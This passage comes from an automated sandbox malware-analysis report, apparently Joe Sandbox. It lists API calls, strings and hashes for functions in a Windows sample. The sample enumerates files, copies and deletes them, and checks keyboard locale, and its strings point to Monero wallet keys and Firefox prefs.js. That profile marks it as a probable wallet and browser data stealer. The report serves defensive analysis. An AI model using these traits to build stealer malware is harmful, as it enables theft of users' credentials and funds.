                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                      • Instruction ID: 25c70a7144cb8ea6f54f23c9828e767d37f53b59e1e27ec353f2f192a2948708
                      • Opcode Fuzzy Hash: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                      • Instruction Fuzzy Hash: 4A6188B1900219BBDB20EFA0DC59FEA777CBB48701F048589F50996140EB74EB89CFA5
                      Function 00554570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                      • wsprintfA.USER32 ref: 005545A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                      • StrCmpCA.SHLWAPI(?,00560FC4), ref: 005545EB
                      • StrCmpCA.SHLWAPI(?,00560FC8), ref: 00554601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0055468B
                      • FindClose.KERNEL32(000000FF), ref: 005546A0
                      • lstrcat.KERNEL32(?,0102FC10), ref: 005546C5
                      • lstrcat.KERNEL32(?,0102E508), ref: 005546D8
                      • lstrlen.KERNEL32(?), ref: 005546E5
                      • lstrlen.KERNEL32(?), ref: 005546F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                      • Instruction ID: d84d3b38120dc258fe4cb8ce6034e4e2a78415416661d8be6979e32facc4e920
                      • Opcode Fuzzy Hash: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                      • Instruction Fuzzy Hash: 1C518AB1550218ABD720EB70DC99FEE777CBB58301F408589F60992190EB789BC8CFA5
                      Function 00553EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 00553EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00553EDA
                      • StrCmpCA.SHLWAPI(?,00560FAC), ref: 00553F08
                      • StrCmpCA.SHLWAPI(?,00560FB0), ref: 00553F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0055406C
                      • FindClose.KERNEL32(000000FF), ref: 00554081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                      • Instruction ID: 3a2c943eeae5c1b31f3e56dc2bf6dc11c673c420c55e6ef6cc633be02eb5b601
                      • Opcode Fuzzy Hash: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                      • Instruction Fuzzy Hash: 73518EB1500219BBDB24FBB0DC59EFA777CBB44301F008589B65996040DB79EB89CF65
                      Function 0054ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 0054ED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 0054ED55
                      • StrCmpCA.SHLWAPI(?,00561538), ref: 0054EDAB
                      • StrCmpCA.SHLWAPI(?,0056153C), ref: 0054EDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054F2AE
                      • FindClose.KERNEL32(000000FF), ref: 0054F2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                      • Instruction ID: 486ff4cc767123a5fac0bb584b301631ae7ed16b74af6591e34bbe1b86cb7b05
                      • Opcode Fuzzy Hash: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                      • Instruction Fuzzy Hash: 8DE106729111195AEB54FB60CC66EEE7B38BF94301F40429AB90B62452EF306F8ECF51
                      Function 0090897D Relevance: 16.6, Strings: 12, Instructions: 1553COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !n<$+]}p$/Z}$/m9$MZp_$P"J{$d!.z$i7($jFv$u#H$LC?$}l
                      • API String ID: 0-4026251849
                      • Opcode ID: e9403752a2c9181891af048fb3d80d7116f516ee21bf298bbfdefbe8a2c4b6e5
                      • Instruction ID: 84576f8ed75eed73252bf9e32fa4904c2b40662699a4e0360f234ef5c08c5035
                      • Opcode Fuzzy Hash: e9403752a2c9181891af048fb3d80d7116f516ee21bf298bbfdefbe8a2c4b6e5
                      • Instruction Fuzzy Hash: B9A25CF360C2049FE304AE2DEC8567BBBD9EF94760F1A853DEAC4C3744E93598058696
                      Function 0054F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005615B8,00560D96), ref: 0054F71E
                      • StrCmpCA.SHLWAPI(?,005615BC), ref: 0054F76F
                      • StrCmpCA.SHLWAPI(?,005615C0), ref: 0054F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0054FAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                      • Instruction ID: 5abe8a42dcb01abe18968737260197d16a9184e07284bc86d766a53c2c46c932
                      • Opcode Fuzzy Hash: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                      • Instruction Fuzzy Hash: 9AB174719101199BDB24FF64DC69EEE7B78BF94301F4086A9A80A97141EF306B4DCF92
                      Function 005416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0056510C,?,?,?,005651B4,?,?,00000000,?,00000000), ref: 00541923
                      • StrCmpCA.SHLWAPI(?,0056525C), ref: 00541973
                      • StrCmpCA.SHLWAPI(?,00565304), ref: 00541989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00541D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00541DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00541E20
                      • FindClose.KERNEL32(000000FF), ref: 00541E32
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                      • Instruction ID: daf8c50fbbee7dde2974cfddf6bde6fd4dce5af52bbf2213185da11359eefa0b
                      • Opcode Fuzzy Hash: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                      • Instruction Fuzzy Hash: 6F12D0719101199BDB15EB60CCAAEEE7B78BF94301F40469AB90666091FF306F8DCF91
                      Function 0054DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00560C2E), ref: 0054DE5E
                      • StrCmpCA.SHLWAPI(?,005614C8), ref: 0054DEAE
                      • StrCmpCA.SHLWAPI(?,005614CC), ref: 0054DEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054E3E0
                      • FindClose.KERNEL32(000000FF), ref: 0054E3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                      • Instruction ID: 97cef51a226f217682985b3e982d204ecac06d4f7c317bdda5e420b4ada69505
                      • Opcode Fuzzy Hash: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                      • Instruction Fuzzy Hash: D3F191718141199ADB15EB60CCA9EEE7B38BF94301F9042DBB80A62091EF346F4DCF55
                      Function 0054DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005614B0,00560C2A), ref: 0054DAEB
                      • StrCmpCA.SHLWAPI(?,005614B4), ref: 0054DB33
                      • StrCmpCA.SHLWAPI(?,005614B8), ref: 0054DB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054DDCC
                      • FindClose.KERNEL32(000000FF), ref: 0054DDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                      • Instruction ID: 361af7dcf32aef6e0e1f78b9673c055ec9175f796e2a54fdafd08a1788224706
                      • Opcode Fuzzy Hash: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                      • Instruction Fuzzy Hash: 4B916572910105A7DB14FB70DC6A9ED7B7CBBC8305F408659FD0A96185FE34AB0D8BA2
                      Function 00557B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,005605AF), ref: 00557BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00557BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00557C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00557C62
                      • LocalFree.KERNEL32(00000000), ref: 00557D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
